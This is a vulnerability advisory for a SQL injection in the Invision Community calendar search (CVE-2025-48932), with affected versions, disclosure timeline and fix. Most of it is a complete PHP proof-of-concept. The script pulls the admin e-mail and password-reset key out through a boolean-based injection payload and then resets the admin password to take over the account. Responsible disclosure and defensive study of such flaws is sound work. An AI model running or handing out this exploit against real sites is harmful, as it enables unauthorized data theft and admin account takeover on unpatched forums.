----------------------------------------------------------------------------
Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability
----------------------------------------------------------------------------


[-] Software Link:

https://invisioncommunity.com


[-] Affected Versions:

Certain 4.x versions before 4.7.21.


[-] Vulnerability Description:

The vulnerability is located within the
/applications/calendar/modules/front/calendar/view.php script.
Specifically, in the IPS\calendar\modules\front\calendar\view::search()
method: user input passed through the "location" request parameter is not
properly sanitized before being used to construct a SQL query. This can be
exploited by remote, unauthenticated attackers to e.g. read sensitive data
from the database through boolean-based SQL Injection attacks. Successful
exploitation of this vulnerability requires the "calendar" application to
be installed and a "GeoLocation feature" (like Google Maps) to be
configured.

NOTE: SQL Injection vulnerabilities in Invision Community 4.x might lead to
admin account takeover and RCE attacks, by resetting the admin's password.
However, starting from version 4.7.18, a new security encryption key has
been introduced within the password reset mechanism. As such, this attack
vector won't work anymore with versions >= 4.7.18.


[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2025-48932.php


[-] Solution:

Upgrade to version 4.7.21 or later.


[-] Disclosure Timeline:

[16/05/2025] - Vendor notified
[27/05/2025] - Version 4.7.21 released
[28/05/2025] - CVE identifier requested
[28/05/2025] - CVE identifier assigned
[23/07/2025] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures program (cve.org) has assigned the
name CVE-2025-48932 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2025-06


--- CVE-2025-48932.php poc ---

<?php

/*
    ----------------------------------------------------------------------------
    Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability
    ----------------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://invisioncommunity.com

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2025-06
*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");

$url = $argv[1];
$ch = curl_init();

@unlink("./cookies.txt");

curl_setopt($ch, CURLOPT_URL, "{$url}");
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");

if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");

$params = ["app" => "calendar", "module" => "calendar", "controller" => "view", "do" => "search", "form_submitted" => 1, "csrfKey" => $csrf[1]];

function sql_injection($sql)
{
    global $ch, $params;

    $min = true;
    $idx = 1;

    while (1)
    {
        $test = 256;

        for ($i = 7; $i >= 0; $i--)
        {
            $test = $min ? $test - pow(2, $i) : $test + pow(2, $i);
            $params["location"] = "'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},0x28,0x31)))#";
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
            $min = preg_match("/elErrorMessage/", curl_exec($ch));
        }

        if (($chr = $min ? $test - 1 : $test) == 0) break;
        $data .= chr($chr);
        $min = true;
        $idx++;
        print "\r[*] Data: {$data}";
    }

    return $data;
}

print "[+] Step 1: fetching admin's e-mail address\n";

$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");

print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";

fgets(STDIN);

print "[+] Step 3: fetching the password reset key\n";

$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");

print "\n[+] Step 4: taking over the admin account by resetting their password\n";

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");

$passwd = md5(time());
$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";

curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");

print "[+] Pwned! You can now login with {$email}:{$passwd}\n";